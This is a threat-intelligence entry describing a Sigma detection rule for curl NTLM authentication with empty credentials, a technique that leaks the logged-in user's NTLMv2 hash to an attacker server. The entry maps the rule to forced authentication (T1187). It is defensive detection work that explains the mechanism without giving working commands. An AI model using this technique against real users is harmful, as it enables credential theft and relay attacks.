NTLM Hash Leak Via Curl NTLM Authentication (916eb839-895e-47f8-99ee-3008bf377a3e)
Detects the use of curl with NTLM authentication and empty credentials (-u :), which can be abused to leak the currently logged-in user's NTLMv2 challenge-response to an attacker-controlled server, enabling offline cracking or relay attacks. When no credentials are provided, the Microsoft-shipped curl passes a NULL identity to Windows SSPI, which automatically falls back to the current user's logon session credentials stored in LSASS — without requiring a plaintext password. This behavior is exclusive to the curl binary shipped by Microsoft (available since Windows 10 / Windows Server 2019), which is built with SSPI support.
| Cluster A | Galaxy A | Cluster B | Galaxy B | Level |
|---|---|---|---|---|
| NTLM Hash Leak Via Curl NTLM Authentication (916eb839-895e-47f8-99ee-3008bf377a3e) | Sigma-Rules | Forced Authentication - T1187 (b77cf5f3-6060-475d-bd60-40ccbf28fdc2) | Attack Pattern | 1 |